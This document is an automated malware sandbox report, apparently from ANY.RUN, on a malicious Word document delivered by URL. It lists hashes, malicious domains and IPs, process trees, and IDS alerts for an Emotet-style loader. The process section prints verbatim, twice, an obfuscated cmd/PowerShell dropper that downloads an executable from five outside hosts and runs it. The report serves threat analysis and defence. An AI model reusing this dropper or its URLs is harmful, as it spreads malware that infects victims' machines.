analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://symbisystems.com/Amazon/Clients_Messages/2019-01/

Full analysis: https://app.any.run/tasks/a364902c-1591-4375-aca6-1d81d2293448
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 18, 2019, 13:34:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
trojan
loader
Indicators:
MD5:

CA9386B954039D0132406B2066F8B80E

SHA1:

3CF9B87A780F096A5C82F4CC37D52803BB47E9BD

SHA256:

82CFB1C0329465521A4BB7F524E15DF152F4757A1EE818D55DCF4DCC702C8045

SSDEEP:

3:N1KNcIsqGyiZBWDARUvU51:COIs9eAH51

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 909.exe (PID: 2644)
      • 909.exe (PID: 2360)
      • wabmetagen.exe (PID: 3416)
      • wabmetagen.exe (PID: 2172)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3592)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3800)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3592)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3592)
      • 909.exe (PID: 2644)
    • Executable content was dropped or overwritten

      • 909.exe (PID: 2360)
      • powershell.exe (PID: 3800)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 3592)
      • chrome.exe (PID: 2856)
    • Creates files in the user directory

      • powershell.exe (PID: 3800)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2932)
    • Starts itself from another location

      • 909.exe (PID: 2360)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3592)
    • Dropped object may contain Bitcoin addresses

      • chrome.exe (PID: 2856)
      • WINWORD.EXE (PID: 3592)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2856)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3592)
      • WINWORD.EXE (PID: 2524)
    • Application launched itself

      • chrome.exe (PID: 2856)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
16
Malicious processes
2
Suspicious processes
5

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs cmd.exe no specs powershell.exe chrome.exe no specs 909.exe no specs 909.exe wabmetagen.exe no specs wabmetagen.exe chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2856"C:\Program Files\Google\Chrome\Application\chrome.exe" http://symbisystems.com/Amazon/Clients_Messages/2019-01/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
68.0.3440.106
3708"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x700d00b0,0x700d00c0,0x700d00ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2952"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2860 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
4048"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=884,6648249723427096982,15695952238347034389,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=AA494380577D90A2CDEFA9D0D1E41C19 --mojo-platform-channel-handle=968 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3068"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=884,6648249723427096982,15695952238347034389,131072 --enable-features=PasswordImport --service-pipe-token=06F0A89E26151B7EC37DAD82D462C525 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=06F0A89E26151B7EC37DAD82D462C525 --renderer-client-id=4 --mojo-platform-channel-handle=1904 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3444"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=884,6648249723427096982,15695952238347034389,131072 --enable-features=PasswordImport --service-pipe-token=3CF9F7AC15F2A08AAA98938C746A79BB --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3CF9F7AC15F2A08AAA98938C746A79BB --renderer-client-id=3 --mojo-platform-channel-handle=2080 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3592"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\eFILE_Order_Details.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2932c:\RialOmanit48\Jewelerya41\Datasi53\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Accountsii15='bluejj13';$Summitwd67=new-object Net.WebClient;$opensourceh66='http://greenplastic.com/hUYu36qNEQ@http://stats.emalaya.org/gWItwAFU@http://innio.biz/rg1n590@http://kiot.coop/yzc2cJzANO@http://atkcgnew.evgeni7e.beget.tech/HkHe3fKTc'.Split('@');$SleekRubberChairkr97='depositr97';$Leadcd52 = '909';$hierarchynh67='olivej51';$opticaljt2=$env:public+'\'+$Leadcd52+'.exe';foreach($SASu76 in $opensourceh66){try{$Summitwd67.DownloadFile($SASu76, $opticaljt2);$indexm59='CSSk36';If ((Get-Item $opticaljt2).length -ge 80000) {Invoke-Item $opticaljt2;$opticalr99='Woodenrn6';break;}}catch{}}$Securitytl32='Divisionf17'; c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3800powershell $Accountsii15='bluejj13';$Summitwd67=new-object Net.WebClient;$opensourceh66='http://greenplastic.com/hUYu36qNEQ@http://stats.emalaya.org/gWItwAFU@http://innio.biz/rg1n590@http://kiot.coop/yzc2cJzANO@http://atkcgnew.evgeni7e.beget.tech/HkHe3fKTc'.Split('@');$SleekRubberChairkr97='depositr97';$Leadcd52 = '909';$hierarchynh67='olivej51';$opticaljt2=$env:public+'\'+$Leadcd52+'.exe';foreach($SASu76 in $opensourceh66){try{$Summitwd67.DownloadFile($SASu76, $opticaljt2);$indexm59='CSSk36';If ((Get-Item $opticaljt2).length -ge 80000) {Invoke-Item $opticaljt2;$opticalr99='Woodenrn6';break;}}catch{}}$Securitytl32='Divisionf17'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 958
Read events
2 481
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
13
Text files
55
Unknown types
3

Dropped files

PID
Process
Filename
Type
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
MD5:
SHA256:
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\c6a484de-d67a-4c9d-b966-e6a0837a8f8f.tmp
MD5:
SHA256:
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\7bb8ebd7-20f1-49af-9099-f0fd41fccc1f.tmp
MD5:
SHA256:
2856chrome.exeC:\Users\admin\Downloads\88d6b334-baac-4d3e-91c5-7f6843e8d2f3.tmp
MD5:
SHA256:
2856chrome.exeC:\Users\admin\Downloads\eFILE_Order_Details.doc.crdownload
MD5:
SHA256:
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
2856chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF20d93d.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
9
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2172
wabmetagen.exe
GET
190.55.123.250:80
http://190.55.123.250/
AR
malicious
3800
powershell.exe
GET
200
69.16.238.96:80
http://greenplastic.com/hUYu36qNEQ/
US
executable
148 Kb
malicious
2856
chrome.exe
GET
200
162.42.205.205:80
http://symbisystems.com/Amazon/Clients_Messages/2019-01/
US
xml
126 Kb
malicious
3800
powershell.exe
GET
301
69.16.238.96:80
http://greenplastic.com/hUYu36qNEQ
US
html
243 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2856
chrome.exe
172.217.16.163:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2856
chrome.exe
172.217.21.195:443
www.gstatic.com
Google Inc.
US
whitelisted
2856
chrome.exe
172.217.16.131:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2856
chrome.exe
172.217.23.173:443
accounts.google.com
Google Inc.
US
whitelisted
2856
chrome.exe
162.42.205.205:80
symbisystems.com
Cyber Trails / Arizona Public Service
US
malicious
2172
wabmetagen.exe
190.55.123.250:80
Telecentro S.A.
AR
malicious
3800
powershell.exe
69.16.238.96:80
greenplastic.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
symbisystems.com
  • 162.42.205.205
unknown
clientservices.googleapis.com
  • 172.217.16.131
whitelisted
www.gstatic.com
  • 172.217.21.195
whitelisted
accounts.google.com
  • 172.217.23.173
shared
ssl.gstatic.com
  • 172.217.16.163
whitelisted
greenplastic.com
  • 69.16.238.96
malicious

Threats

PID
Process
Class
Message
2856
chrome.exe
A Network Trojan was detected
ET TROJAN Possible malicious Office doc hidden in XML file
3800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3800
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3800
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3800
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3800
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info